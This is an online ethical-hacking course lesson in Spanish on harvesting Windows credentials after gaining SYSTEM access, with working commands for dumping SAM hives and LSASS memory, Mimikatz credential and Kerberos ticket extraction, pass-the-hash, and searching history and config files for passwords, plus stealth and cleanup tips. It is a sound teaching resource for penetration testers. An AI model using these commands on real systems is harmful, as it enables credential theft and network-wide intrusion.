Recolección de credenciales
Volcar secretos
Recolección de credenciales es una lección gratuita de Ethical Hacking Academy en CoddyKit. Esta es la lección 4 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Ethical Hacking Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Ethical Hacking Academy incluye 4 lecciones en total.
¿Por qué recopilar credenciales?
Incluso después de obtener SYSTEM, el verdadero premio suelen ser las credenciales — hashes de contraseñas, contraseñas en texto plano y tickets que permiten moverse lateralmente y alcanzar el dominio. La recopilación de credenciales convierte un equipo comprometido en toda la red.
La base de datos SAM
Los hashes de las cuentas locales se almacenan en la colmena del Registro SAM, cifrada con una clave de la colmena SYSTEM. Con acceso SYSTEM puede volcar ambas y extraer los hashes NTLM sin conexión.
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCALMemoria de LSASS
El proceso LSASS mantiene en memoria las credenciales de los usuarios que han iniciado sesión — a menudo incluye contraseñas en texto plano o hashes NTLM reutilizables y tickets de Kerberos. Volcar LSASS es la acción de recopilación de mayor valor.
rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp fullMimikatz
Mimikatz es la herramienta emblemática de extracción de credenciales. sekurlsa::logonpasswords extrae credenciales de LSASS; también puede extraer tickets, realizar pass-the-hash y volcar SAM.
privilege::debug
sekurlsa::logonpasswords
lsadump::samPass-the-Hash
A menudo no necesita descifrar un hash — pass-the-hash autentica directamente mediante el hash NTLM. Por eso basta con volcar los hashes para moverse lateralmente entre equipos que comparten credenciales de administrador local.
pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>Credenciales de dominio almacenadas en caché
Los equipos unidos a un dominio almacenan en caché los últimos inicios de sesión (MSCache/DCC2) para que los usuarios puedan iniciar sesión sin conexión. Estos hashes almacenados en caché pueden volcarse y descifrarse sin conexión (lentamente), lo que permite obtener las contraseñas del dominio.
secretsdump.py -system system.save -security security.save LOCALCredenciales guardadas y almacenadas
Windows almacena credenciales en Credential Manager / Vault y como blobs protegidos por DPAPI (RDP guardado, contraseñas del navegador y redes Wi-Fi). Con SYSTEM y las claves maestras puede descifrarlas.
cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>Robo de tickets de Kerberos
En Active Directory, sekurlsa::tickets de Mimikatz exporta TGT/TGS de Kerberos. Los tickets robados permiten realizar pass-the-ticket, y un TGT de administrador de dominio puede conducir a la persistencia mediante Golden/Silver Ticket.
sekurlsa::tickets /exportArchivos y scripts con secretos
No pase por alto las oportunidades sencillas: scripts, archivos de configuración e historiales llenos de credenciales en texto plano. El historial de PowerShell, los archivos desatendidos y las cadenas de conexión de IIS web.config suelen contener contraseñas.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.configLimpieza y OPSEC
Los EDR supervisan intensamente el volcado de LSASS y Defender Credential Guard puede bloquearlo. En las operaciones, prefiera métodos sigilosos, elimine los archivos de volcado y documente en el informe aquello a lo que accedió.
Ética y autorización
La recopilación de credenciales expone los secretos más sensibles de la organización. Proteja las credenciales volcadas, nunca las exfiltre fuera del alcance autorizado y actúe únicamente con autorización explícita y por escrito.
Comprobación rápida
Compruebe sus conocimientos sobre la recopilación de credenciales.
Repaso
Ha aprendido sobre la recopilación de credenciales:
- Vuelque SAM para obtener hashes locales; vuelque LSASS para obtener usuarios con sesión iniciada y tickets
- Mimikatz extrae contraseñas, hashes y tickets de Kerberos
- Pass-the-hash / pass-the-ticket permiten el movimiento lateral sin descifrar credenciales
- Busque secretos en Credential Manager, DPAPI y los archivos de configuración e historial
Con esto finaliza el curso de escalada de privilegios en Windows.
Preguntas frecuentes
¿La lección «Recolección de credenciales» es gratis?
Sí — el texto completo de «Recolección de credenciales» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Ethical Hacking Academy, actualiza a CoddyKit PRO. El curso de Ethical Hacking Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Recolección de credenciales»?
Volcar secretos Practicas Ethical Hacking Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Ethical Hacking Academy?
No se requiere experiencia previa. Ethical Hacking Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 4 de 4.
¿Cuánto tiempo toma la lección «Recolección de credenciales»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Ethical Hacking Academy?
Sí. Cada lección de Ethical Hacking Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Enumeración de Windows
- Configuraciones incorrectas de servicios
- Suplantación de tokens
- Recolección de credenciales